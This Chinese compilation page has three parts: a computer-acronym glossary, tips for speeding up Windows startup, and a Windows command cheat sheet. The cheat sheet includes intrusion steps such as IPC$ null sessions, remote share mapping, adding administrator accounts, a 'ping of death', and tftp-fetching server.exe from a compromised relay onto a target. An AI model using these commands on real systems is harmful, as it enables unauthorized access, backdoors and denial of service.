Super Intelligent Sound ASIC(超级智慧音频集成电路)
THD+N(Total Harmonic Distortion plus Noise,总谐波失真加噪音)
QEM(QSound Environmental Modeling,QSound环境建模)
WG(Wave Guide,波导合成)
WT(Wave Table,波表合成)

6、RAM&ROM
ABP(Address Bit Permuting,地址位序列改变)
ATC(Access Time from Clock,时钟存取时间)
BSRAM(Burst pipelined synchronous static RAM,突发式管道同步静态内存)
CAS(Column Address Strobe,列地址控制器)
CCT(Clock Cycle Time,时钟周期)
DB(Deep Buffer,深度缓冲)
DDR SDRAM(Double Date Rate,双数据率SDRAM)
DIL(dual-in-line)
DIMM(Dual In-line Memory Modules,双重内嵌式内存模块)
DRAM(Dynamic Random Access Memory,动态随机内存)
DRDRAM(Direct RAMbus DRAM,直接RAMbus内存)
ECC(Error Checking and Correction,错误检查修正)
EEPROM(Electrically Erasable Programmable ROM,电擦写可编程只读存储器)
FM(Flash Memory,闪存)
FMD ROM (Fluorescent Material Read Only Memory,荧光质只读存储器)
PIROM(Processor Information ROM,处理器信息ROM)
PLEDM(Phase-state Low Electron(hole)-number Drive Memory)
RAC(Rambus Asic Cell,Rambus集成电路单元)
RAS(Row Address Strobe,行地址控制器)
RDRAM(Rambus Direct RAM,直接型RambusRAM)
DIMM(RAMBUS In-line Memory Modules,RAMBUS内嵌式内存模块)
SDR SDRAM(Single Date Rate,单数据率SDRAM)
SGRAM(synchronous graphics RAM,同步图形随机储存器)
SO-DIMM(Small Outline Dual In-line Memory Modules,小型双重内嵌式内存模块)
SPD(Serial Presence Detect,串行存在检查)
SRAM(Static Random Access Memory,静态随机内存)
SSTL-2(Stub Series Terminated Logic-2)
TSOPs(thin small outline packages,超小型封装)
USWV(Uncacheable,Speculative,Write-Combining非缓冲随机混合写入)
VCMA(Virtual Channel Memory architecture,虚拟信道内存结构)

7、磁盘
AAT(Average access time,平均存取时间)
ABS(Auto Balance System,自动平衡系统)
ASMO(Advanced Storage Magneto-Optical,增强形光学内存)
AST(Average Seek time,平均寻道时间)
ATA(AT Attachment,AT扩展型)
ATOMM(Advanced super Thin-layer and high-Output Metal Media,增强形超薄高速金属媒体)
bps(bit per second,位/秒)
CSS(Common Command Set,通用指令集)
DMA(Direct Memory Access,直接内存存取)
DVD(Digital Video Disk,数字视频光盘)
EIDE(enhanced Integrated Drive Electronics,增强形电子集成驱动器)
FAT(File Allocation Tables,文件分配表)
FDBM(Fluid dynamic bearing motors,液态轴承马达)
FDC(Floppy Disk Controller,软盘驱动器控制装置)
FDD(Floppy Disk Driver,软盘驱动器)
GMR(giant magnetoresistive,巨型磁阻)
HDA(head disk assembly,磁头集合)
HiFD(high-capacity floppy disk,高容量软盘)
IDE(Integrated Drive Electronics,电子集成驱动器)
LBA(Logical Block Addressing,逻辑块寻址)
MBR(Master Boot Record,主引导记录)
MTBF(Mean Time Before Failure,平均故障时间)
PIO(Programmed Input Output,可编程输入输出模式)
PRML(Partial Response Maximum Likelihood,最大可能部分反应,用于提高磁盘读写传输率)
RPM(Rotation Per Minute,转/分)
RSD(Removable Storage Device,移动式存储设备)
SCSI(Small Computer System Interface,小型计算机系统接口)
SCMA(SCSI Configured Auto Magically,SCSI自动配置)
S.M.A.R.T.(Self-Monitoring, Analysis and Reporting Technology,自动监测、分析和报告技术)
SPS(Shock Protection System,抗震保护系统)
Ultra DMA(Ultra Direct Memory Access,超高速直接内存存取)
LVD(Low Voltage Differential)
Seagate硬盘技术
DiscWizard(磁盘控制软件)
DST(Drive Self Test,磁盘自检程序)
SeaShield(防静电防撞击外壳)

8、光驱
ATAPI(AT Attachment Packet Interface)
BCF(Boot Catalog File,启动目录文件)
BIF(Boot Image File,启动映射档)
CDR(CD Recordable,可记录光盘)
CD-ROM/XA(CD-ROM eXtended Architecture,只读光盘增强形架构)
CDRW(CD-Rewritable,可重复刻录光盘)
CLV(Constant Linear Velocity,恒定线速度)
DAE(digital Audio Extraction,资料音频抓取)
DDSS(Double Dynamic Suspension System,双悬浮动态减震系统)
DDSS II(Double Dynamic Suspension System II,第二代双层动力悬吊系统)
PCAV(Part Constant Angular Velocity,部分恒定角速度)
VCD(Video CD,视频CD)

9、打印机
AAS(Automatic Area Seagment?)
dpi(dot per inch,每英寸的打印像素)
ECP(Extended Capabilities Port,延长能力埠)
EPP(Enhanced Parallel Port,增强形并行接口)
IPP(Internet Printing Protocol,因特网打印协议)
ppm(paper per minute,页/分)
SPP(Standard Parallel Port,标准并行口)
TET(Text Enhanced Technology,文本增强技术)
USBDCDPD(Universal Serial Bus Device Class Definition for Printing Devices,打印设备的通用串行总线级标准)
VD(Variable Dot,变点式打印)

10、扫描仪
TWAIN(Toolkit Without An Interesting Name,协议)

11、计算机公司
Ali(Acer Lab,宏基实验室)
ASF(Applied Science Fiction,?)
AMD: Advanced Micro Device(超微半导体)
AMI(American Megatrends Incorporated,?)
EAR(Extreme Audio Reality,?)
HP(Hewlett-Packard,美国惠普公司)
IBM(International Business Machine,国际商业机器)
IDG(International Data Group,国际资料集团)
IMS(International Meta System,?)
MLE(Microsoft Learning and Entertainment,微软教学与娱乐公司)
MS(Microsoft,微软)
NAI(Network Associates Incorporation,前身为McAfee)
NS(National Semiconductor,国家半导体)
PMI(Pacific Magtron International)
SCE(sony computer entertainment,索尼计算机娱乐部)
SGI(Silicon Graphics,?)
SiS(Silicon Integrated Systems,硅片综合系统公司)
UMC(United Microelectronics Corporation,台湾联华电子公司,半导体制造商)
WD(Western Digital,西部数据)
ZD(Ziff-Davis出版公司)

12、组织
CBF(Cable Broadband Forum,电缆宽带论坛)
CEMA(Consumer Electronics Manufacturing Association,消费者电子制造业协会)
CPE(Customer Premise Equipment,用户预定设备)
CSA(Canadian Standards Association,加拿大标准协会)
DCA(Defense Communication Agency,国防部通信局)
DOJ(Department of Justice,反不正当竞争部门)
DSP(Delivery Service Partner,交付服务合伙人)
DVB(Digital Video Broadcasting,数位视频广播)
E3(Electronic Entertainment Expo,电子娱乐展览会)
EFF: Electronic Frontier Foundation(电子前线基金会)
EPA(Environmental Protection Agency,美国环境保护局)
FCC(Federal Communications Commission,联邦通信委员会)
FTC(Federal Trade Commission,联邦商业委员会)
GDC(Game Developer Conference,游戏发展商会议)
ISSCC(International Solid-State Circuits Conference,国际晶体管电路讨论会)
ICSA(International Computer Security Association,国际计算机安全协会,它的前身为NCSA(National Computer Security Association,国家计算机安全协会)
IEEE(Institute of Electrical and Electronics Engineers,电子电路工程师协会)
IFWP(International Forum White Paper,国际白皮书论坛)
ISO/MPEG(International Standard Organization's Moving Picture Expert Group,国际标准化组织的活动图片专家组)
ITAA(Information Technology Association of American,美国信息技术协会)
MAC(Mobile Advisory Council,?)
MCSP(Microsoft Certified Solution Providers,微软认证解决方案供货商)
MJPEG(Motion Joint Photographic Experts Group,移动式连续图像专家组)
MMA(MIDI Manufacturer Association,MIDI制造商联盟)
NCTA(National Cable Television Association,美国电缆电视协会)
NIA(Networking Interoperatility Alliance,网络互操作联盟)
NBITD(National Board for Industrual and Technical Development,瑞典国立工业和技术发展委员会制订)
OAAF(Open Arcade Architecture Forum,开放式Arcade体系论坛)
OEM(Original Equipment Manufacturer,原始设备制造商)
OIF(Optical Internetworking Forum,光纤互连网络论坛)
RIAA(Recording Industry Association of America,美国唱片工业协会)
RIO(Redistributed Internet Object,因特网分配组织)
SIA(The Semiconductor Industries Association,半导体工业协会)
SPA(Software Publishers Association,软件出版商协会)
TSOWU(The Swedish office worker's union,瑞典办公人员联合会,以制订TCO标准著称)
UAWG(Universal ADSL Working Group,通用ADSL工作组)
UCAID(University Corporation for Advanced Internet Development,?)
UL(Underwriters Laboratories Inc.,新产品承诺实验室)
VAR(&#118alue Added Resellers,增值分销商)
W3C(World Wide Web Consortium,万维网协会)
WHQL(Microsoft Windows Hardware Quality Lab,微软公司窗口硬件质量实验室)
WinHEC(Windows Hardware Engineering Conference,窗口硬件工程会议

13、编程
API(Application Programming Interfaces,应用程序接口)
ASCII(American Standard Code for Information Interchange,美国国家标准信息交换代码)
ATL(ActiveX Template Library,ActiveX范本库)
BASIC(Beginner's All-purpose Symbolic Instruction Code,初学者通用指令代码)
COM(Component Object Model,组件对象模式)
DNA(Distributed Internet Application,分布式因特网应用程序)
MFC(Microsoft Foundation Classes,微软基础类库)
SDK(Software Development Kit,软件开发工具包)

14、Windows
CE(Consumer Electronics,消费电子)
DCOM(Distributing Component Object Model,构造物体模块)
DHCP(Dynamic Host Configuration Protocol,动态主机分配协议)
DMF(Distribution Media Format,?)
GDI(Graphics Device Interface,图形设备接口)
GUI(Graphics User Interface,图形用户接口)
GPF(General protect fault,一般保护性错误)
HTA(HyperText Application,超文本应用程序)
INF File(Information File,信息文件)
INI File(Initialization File,初始化文件)
NDIS(Network Driver Interface Specification,网络驱动程序接口规范)
NT(New Technology,新技术)
Qos(Quality of Service,服务质量)
RRVP(Resource ReserVation Protocol,资源保留协议)
RTOS(Real Time Operating Systems,实时操作系统)
SBFS(Simple Boot Flag Specification,简单引导标记规范)
VEFAT(Virtual File Allocation Table,虚拟文件分配表)
VxD(Virtual device drivers,虚拟设备驱动程序)
WDM(Windows Driver Model,窗口驱动程序模块)
Winsock(Windows Socket,窗口套接口)
WHQL(Windows Hardware Quality Labs,Windows硬件质量实验室)
WHS(Windows Scripting Host,窗口脚本程序)
ZAM(Zero Administration for Windows,零管理窗口系统)

15、加密
ECC(Elliptic Curve Crypto,椭圆曲线加密)
SET(Secure Electronic Transaction,安全电子交易)

16、语言
CSS(Cascading Style Sheets,层迭格式表)
DCD(Document Content Description for XML: XML档内容描述)
DTD(Document Type Definition,档类型定义)
HTML(HyperText Markup Language,超文本标记语言)
JVM(Java Virtual Machine, Java虚拟机)
OJI(Open Java VM Interface,开放JAVA虚拟机界面)
SGML(Standard Generalized Markup Language,标准通用标记语言)
SMIL(Synchronous Multimedia Integrate Language,同步多媒体集成语言)
VRML(Virtual Reality Makeup Language,虚拟现实结构化语言)
VXML(Voice eXtensible Markup Language,语音扩展标记语言)
XML(Extensible Markup Language,可扩展标记语言)
XSL(Extensible Style Sheet Language,可扩展设计语言)

17、网络
ADSL(Asymmetric Digital Subscriber Line,不对称数位订阅线路)
AH(Authentication Header,鉴定文件头)
AMR(Audio/Modem Riser,音效/数据主机板附加直立插卡)
ARP(Address Resolution Protocol,地址解析协议)
ATM(Asynchronous Transfer Mode,异步传输模式)
BOD(Bandwidth On Demand,弹性带宽运用)
CBR(Committed Burst Rate,约定突发速率)
CCIRN(Coordinating Committee for Intercontinental Research Networking,洲际研究网络协调委员会)
CCM(Call Control Manager,拨号控制管理)
CDSL(Consumer Digital Subscriber Line,消费者数位订阅线路)
CGI(Common Gateway Interface,通用网关接口)
CIEA(Commercial Internet Exchange Association,商业因特网交易协会)
CIR(Committed Infomation Rate,约定信息速率)
CTS(Clear to Send,清除发送)
DBS-PC(Direct Broadcast Satellite PC,人造卫星直接广播式PC)
DCE(Data Circuit Terminal Equipment,数据通信设备)
DES(Data Encryption Standard,数据加密标准)
DMT(Discrete Multi - Tone,不连续多基频模式)
DNS(Domain Name System,域名系统)
DOCSIS(Data Over Cable Service Interface Specifications,线缆服务接口数据规格)
DTE(Data Terminal Equipment,数据终端设备)
EBR(Excess Burst Rate,超额突发速率)
ESP(Encapsulating Security Payload,压缩安全有效载荷)
FDM(Frequency Division Multi,频率分离)
FRICC(Federal Research Internet Coordinating Committee,联邦调查因特网协调委员会)
FTP(File Transfer Protocol,文件传输协议)
Ghost(General Hardware Oriented System Transfer,全面硬件导向系统转移)
HDSL(High bit rate DSL,高比特率数位订阅线路)
HTTP(HyperText Transfer Protocol,超文本传输协议)
ICMP(Internet Control Message Protocol,因特网信息控制协议)
IETF(Internet Engineering Task Framework,因特网工程任务组)
IKE(Internet Key Exchange,因特网密钥交换协议)
IMAP4(Internet Message Access Protocol Version 4,第四版因特网信息存取协议)
Internet(因特网)
IP(Internet Protocol,网际协议)
ISDN(Integrated Service Digital Network,综合服务数字网络)
ISOC(Internet Society,因特网协会)
ISP(Internet Service Provider,因特网服务提供商)
LAN(Local Area Network,局域网)
LDAP(Lightweight Directory Access Protocol,轻权目录访问协议)
LOM(LAN-on-Montherboard)
IAB(Internet Activities Board,因特网工作委员会)
IETF(Internet Engineering Task Force,因特网工程作业推动)
L2TP(Layer 2 Tunneling Protocol,二级信道协议)
LMDS(Local Multipoint Distributed System,局域多点分布式系统)
MIME(Multipurpose Internet Mail Extension,多用途因特网邮件扩展协议)
MNP(Microcom Networking Protocal)
MODEM(Modulator Demodulator,调制解调器)
NAT(Network Address Translation,网络地址转换)
NC(Network Computer,网络计算机)
NDS(Novell Directory Service,Novell目录服务)
NNTP(Network News Transfer Protocol,网络新闻传输协议)
MSN(Microsoft Network,微软网络)
OFDM(orthogonal frequency division multiplexing,直角频率部分多任务)
P3P(Privacy Preference Project,个人私隐安全平台)
PDS(Public Directory Support,公众目录支持)
PGP(Pretty Good Privacy,优良保密协议)
PICS(Platform for Internet Content Selection,因特网内容选择平台)
POF(Polymer Optical Fiber,聚合体光纤)
POP3(Post Office Protocol Version 3,第三版电子邮局协议)
PPTP(Point to Point Tunneling Protocol,点对点信道协议)
RADSL(Rate Adaptive DSL,速率自适应数字订阅线路)
RARP(Reverse Address Resolution Protocol,反向地址解析协议)
RDF(Resource Description Framework,资源描述框架)
RSA(Rivest Shamir Adlemen,一种因特网加密和认证体系)
RTS(Request To Send,需求发送)
SIS(Switched Internetworking Services,交换式网络互联服务)
S/MIME(Secure MIME,安全多用途因特网邮件扩展协议)
SNMP(Simple Network Management Protocol,简单网络管理协议)
SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)
SKIP(Simple Key Exchange Internet Protocol,因特网简单密钥交换协议)
SUA(Single User Account,单用户账号)
TCP(Transmission Control Protocol,传输控制协议)
UDP(User Datagram Protocol,用户数据报协议)
ULS(User Location Service,用户定位服务)
VOD(Video On Demand,视频点播)
VPN(virtual private network, 虚拟局域网)
WWW(World Wide Web,万维网,是因特网的一部分)

18、通信
CTI(Computer Telephone Integration,计算机电话综合技术)
DBS(Direct Broadcast Satellite,直接卫星广播)
DWDM(Dense WaveLength Division Multiplex,波长密集型复用技术)
MMDS(Multichannel Multipoint Distribution Service,多波段多点分发服务)
PCM(Pulse Code Modulation,脉冲编码调制)
PSTN(Public Switched Telephone Network,公用交换式电话网)
TAPI(Telephony Application Programming Interface,电话应用程序接口)
TSAPI(Telephony Services Application Programming Interface,电话服务应用程序接口)
WDM(WaveLength Division Multiplex,波分多任务)

19、游戏
ACT(Action,动作类游戏)
ARPG(Action Role Play Games,动作角色扮演游戏)
AVG(Adventure Genre,冒险类游戏)
DAN(Dance,跳舞类游戏,包括跳舞机、吉它机、打鼓机等)
DC(Dreamcast,世嘉64位游戏机)
ETC(etc,其它类游戏,包括模拟飞行)
FFJ(Force Feedback Joystick,力量反匮式操纵杆)
FPP(First Person Game,第一人称游戏)
FTG(Fighting Game,格斗类游戏)
GB(Game Boy,任天堂4位手提游戏机)
GBC(Game Boy Color,任天堂手提16色游戏机)
GG(Game Gear,世嘉彩色手提游戏机)
FC(Famicom,任天堂8位游戏机)
fps(frames per second,帧/秒)
FR(Frames Rate,游戏运行帧数)
MAC(Macintosh,苹果计算机)
N64(Nintendo 64,任天堂64位游戏机)
SFC(Super Famicom,超级任天堂16位游戏机)
SLG(Simulation Game,模拟类游戏)
SPG(Sports Games,运动类游戏)
SRPG(Strategies Role Play Games,战略角色扮演游戏)
STG(Shoot Game,射击类游戏)
SS(Sega Saturn,世嘉土星32位游戏机)
PC(Personal Computer,个人计算机)
PS(Play Station,索尼32位游戏机)
PS(Pocket Station,索尼手提游戏机)
RAC(race,赛车类游戏)
RTS(Real Time Strategies,实时战略)
RPG(Role Play Games,角色扮演游戏)
TAB(Table Chess,桌棋类游戏)

20、服务器
C2C(card-to-card interleaving,卡到卡交错存取)
cc-NUMA(cache-coherent non uniform memory access,连贯缓冲非统一内存寻址)
CHRP(Common Hardware Reference Platform,共享硬件平台,IBM为PowerPC制定的标准,可以兼容Mac OS, Windows NT, Solaris, OS/2, Linux和AIX等多种操作系统)
EMP(Emergency Management Port,紧急事件管理埠)
ICMB(Inter-Chassis Management Bus, 内部管理总线)
MPP(Massive Parallel Processing,巨量平行处理架构)
MUX(Data Path Multiplexor,多重路径数据访问)
SOS(Server Operating Systems,服务器操作系统)
TPS(transactions per second,每秒处理事项数)
UPA(Ultra Port Architecture,超级端口结构)

21、其它
AL(Artificial Life,人工生命)
APM(Advanced Power Management,高级能源管理)
AVI(Audio Video Interleave,音频视频插入)
ASPI(Advanced SCSI Program Interface, 高级SCSI编程界面。它定义了当和SCSI主机适配器通讯时应用程序使用的一系列软件命令)
Benchmarks(基准测试程序数值)
BOPS(Billion Operations Per Second,十亿次运算/秒)
BSD(Berkeley Software Distribution,伯克利软件分配代号)
CAD(computer-aided design,计算机辅助设计)
CCD(Charge Coupled Device,电荷连接设备)
CCS(Cut Change System)
COMDEX (Computer Distribution Exposition,计算机代理分销业展览会)
CEO(Chief Executive Officer,首席执行官)
COO(Chief Organizer Officer,首席管理官)
CTO(Chief Technology Officer,首席技术官)
CTS(Carpal Tunnel Sydrome,计算机腕管综合症)
CPS(Certification Practice Statement,使用证明书)
CVS(Compute Visual Syndrome,计算机视觉综合症)
DAC(Dual Address Cycle,双重地址周期)
DPC(Desktop PC,桌面PC)
DSL(Data Strobe Link,数据选通连接)
ERP(Enterprise Requirement Planning,企业需求计划)
ERP(estimated retail price,估计零售价)
ES(Energy Star,能源之星)
FAQ(Frequently Asked Questions,常见问题回答)
GPS(Global Positioning System,全球定位系统)
HCI(Host Controller Interface,主机控制接口)
HCT(Hardware Compatibility Test,硬件兼容性测试)
HPS(High Performance Server,高性能服务器)
HPW(High Performance Workstation,高性能工作站)
IHVs(Independent Hardware Vendors,独立硬件购买者)
IRQ(Interrupt Request,中断请求)
ISVs(Independent Software Vendors,独立软件购买者)
JIT(Just In Time,准时制生产)
MFD(Multi Function Device,多功能设备)
MIPS(Million Instruction Per Second,百万条指令/秒)
MMVF(Multi-Media Video File,多媒体视频文件)
MRP(Material Requirement Planning,物料需求计划)
MRP II(Manufacturing Resource Planning,制造资源计划)
MRS(Midrange Server,中型服务器)
MRW(Midrange Workststion,中型工作站)
MSP(Media Stream Processor,媒体流处理器)
MTVPAK(Microsoft TV Platform Adaptation Kit,微软TV平台适配套件)
OPT(Optimized Production Technology,优化生产技术)
PIC(Programmable Interrupt Controller,可编程中断控制器)
PIM(Personal Information Management,个人信息管理系统)
PNP(Plug and Play,即插即用)
PSU(Power Supply Unit,计算机电源)
REMA(Realtime Exclusive Mode Applications,实时高级应用)
RF(Radio Frequency,无线电频率)
SAM(sales available market,可发售市场)
SCT(Software Compatibility Test,软件兼容性测试)
SMD(Surface Mount Device,表面安装设备)
SMM(System Management Mode,系统管理模式)
SMP(GSymmetic Multi-Processor)
SOAC(System On a Chip,系统集成多功能芯片)
STB(Set Top Boxes,顶置盒)
TCO(Total Cost of Ownership,拥有总成本)
TSID( Technical Support Identification Number,技术支持代码)
TTL(Transistor-Transistor Logic,晶体管to晶体管逻辑电路)
TQM(Total Quality Management,全面质量管理)
VBI(Vertical Blanking Interval,垂直空白间隔)
WfM(Wired for Management,有线管理)
WMI(Wired for Management Initiative,主动式管理线路)
WOL(Wake On Lan,局域网唤醒)

 

提高Windows速度的八绝招

大家都希望电脑一开机就可以立即进入Windows 系统而不用等待,但由于种种原因常常未能如愿,甚至一开机就死机的情况也时有发生。其实有些时候Windows 启动速度缓慢并不是它本身的问题,而是一些设备或软件造成的,看看下面拖慢系统启动的8个原因,再查一查你的电脑是不是也存在类似问题!

  1.USB硬盘和扫描仪等设备

  如果电脑安装了扫描仪等设备,或在启动时已经连接了USB硬盘,那么不妨试试先将它们断开,看看启动速度是不是有变化。一般来说,由于USB接口速度较慢,因此相应设备会对电脑启动速度有较明显的影响,应该尽量在启动后再连接USB设备。如果没有USB设备,那么建议直接在BIOS设置中将USB功能关闭。

  提示:由于Windows 启动时会对各个驱动器(包括光驱)进行检测,因此如果光驱中放置了光盘,也会延长电脑的启动时间。

  2.令人心烦的网卡

  如果设置不当,网卡也会明显影响系统启动速度,如果你的电脑用不着网卡,那就直接将网卡拔掉,以免影响系统启动速度。

  如果你的电脑连接在局域网内,安装好网卡驱动程序后,默认情况下系统会自动通过DHCP来获得IP地址,但大多数公司的局域网并没有DHCP服务器,因此如果用户设置成“自动获得IP地址”,系统在启动时就会不断在网络中搜索DHCP 服务器,直到获得IP 地址或超时,自然就影响了启动时间,因此局域网用户最好为自己的电脑指定固定IP地址。

  3.文件和打印机共享

  有些安装了Windows XP专业版的电脑也会出现启动非常慢的问题,甚至达到了1分40秒之多!系统似乎死机了,登录系统后,桌面也不出现,电脑就像停止反应,1分钟后才能正常使用。这是由于使用了Bootvis.exe 程序后,其中的Mrxsmb.dll文件为电脑启动添加了67秒的时间!

  要解决这个问题,只要停止共享文件夹和打印机即可:选择“开始→设置→网络和拨号连接”,右击“本地连接”,选择“属性”,在打开的窗口中取消“此连接使用下列选定的组件”下的“Microsoft网络的文件和打印机共享”前的复选框,重启电脑即可。

  提示:微软已经对Bootvis.exe文件进行了多次升级,而且它确实对Windows XP的启动速度有很大帮助,建议大家到http //www.microsoft.com/whdc/hwdev/platform/performance/fastboot/default.mspx 下载该工具。

  4.断开不用的网络驱动器

  为了消除或减少 Windows 必须重新建立的网络连接数目,建议将一些不需要使用的网络驱动器断开,也就是进入“我的电脑”,右击已经建立映射的网络驱动器,选择“断开”即可。

  5.硬盘分区太多也有错

  如果你的Windows 2000没有升级到SP3或SP4,并且定义了太多的分区,那么也会使启动变得很漫长,甚至挂起。所以建议升级最新的SP4,同时最好不要为硬盘分太多的区。因为Windows 在启动时必须装载每个分区,随着分区数量的增多,完成此操作的时间总量也会不断增长。

  6.桌面图标太多会惹祸

  桌面上有太多图标也会降低系统启动速度。Windows每次启动并显示桌面时,都需要逐个查找桌面快捷方式的图标并加载它们,图标越多,所花费的时间当然就越多。建议大家将不常用的桌面图标放到一个专门的文件夹中或者干脆删除!

  提示:有些杀毒软件提供了系统启动扫描功能,这将会耗费非常多的时间,其实如果你已经打开了杀毒软件的实时监视功能,那么启动时扫描系统就显得有些多余,还是将这项功能禁止吧!

  7.字体过多也拖后腿

  尽管微软声称Windows可以安装1000~1500种字体,但实际上我们却发现当安装的字体超过500 种时,就会出现问题,比如:字体从应用程序的字体列表中消失以及Windows的启动速度大幅下降。在此建议最好将用不到或者不常用的字体删除,为避免删除后发生意外,可先进行必要的备份。

  8.微软自己起“内讧”

  还记得Windows XP的某个补丁造成系统启动变慢的新闻吧(比如:代号为 Q328310的补丁会造成Windows 2000/XP启动和关机速度奇慢,甚至有可能导致注册表锁死),可见微软自己内部出问题的可能性也不小,如果你在升级了某个系统补丁后,突然发现系统启动变慢,那么最好留意一下是不是补丁惹的祸。
 

★ DOS命令字典收藏 ★

【1】 

net use \\ip\ipc$ " " /user:" " 建立IPC空链接 
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 
net use h: \\ip\c$ 登陆后映射对方C:到本地为H: 
net use \\ip\ipc$ /del 删除IPC链接 
net use h: /del 删除映射对方到本地的为H:的映射 
net user 用户名 密码 /add 建立用户 
net user guest /active:yes 激活guest用户 
net user 查看有哪些用户 
net user 帐户名 查看帐户的属性 
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数 
net start 查看开启了哪些服务 
net start 服务名  开启服务;(如:net start telnet, net start schedule) 
net stop 服务名 停止某服务 
net time \\目标ip 查看对方时间 
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 
net view 查看本地局域网内开启了哪些共享 
net view \\ip 查看对方局域网内开启了哪些共享 
net config 显示系统网络设置 
net logoff 断开连接的共享 
net pause 服务名 暂停某服务 
net send ip "文本信息" 向对方发信息 
net ver 局域网内正在使用的网络连接类型和信息 
net share 查看本地开启的共享 
net share ipc$ 开启ipc$共享 
net share ipc$ /del 删除ipc$共享 
net share c$ /del 删除C:共享 
net user guest 12345 用guest用户登陆后用将密码改为12345 
net password 密码 更改系统登陆密码 
netstat -a 查看开启了哪些端口,常用netstat -an 
netstat -n 查看端口的网络连接情况,常用netstat -an 
netstat -v 查看正在进行的工作 
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 
netstat -s 查看正在使用的所有协议使用情况 
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 
ping -t -l 65550 ip 死*之ping(发送大于64K的文件并一直ping就成了死*之ping) 
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 

【2】 

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) 
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 
fc one.*t two.*t > 3st.*t 对比二个文件并把不同之处输出到3st.*t文件中,"> "和"> >" 是重定向命令 
at id号 开启已注册的某个计划任务 
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 
at id号 /delete 停止某个已注册的计划任务 
at 查看所有的计划任务 
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 
finger username @host 查看最近有哪些用户登陆 
telnet ip 端口 远和登陆服务器,默认端口为23 
open ip 连接到IP(属telnet登陆后的命令) 
telnet 在本机上直接键入telnet 将进入本机的telnet 
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 
copy c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下 
cppy 1st.jpg/b+2st.*t/a 3st.jpg 将2st.*t的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.*t文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 
copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C: 
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 
mem 查看cpu使用情况 
attrib 文件名(目录名) 查看某文件(目录)的属性 
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 
set 指定环境变量名称=要指派给变量的字符 设置环境变量 
set 显示当前所有的环境变量 
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 
pause 暂停批处理程序,并显示出:请按任意键继续.... 
if 在批处理程序中执行条件处理(更多说明见if命令及变量) 
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) 
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) 
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) 
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 
echo 信息 在屏幕上显示出信息 
echo 信息 >> pass.*t 将"信息"保存到pass.*t文件中 
findstr "Hello" aa.*t 在aa.*t文件中寻找字符串hello 
find 文件名 查找某文件 
title 标题名字 更改CMD窗口标题名字 
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) 

【3】 

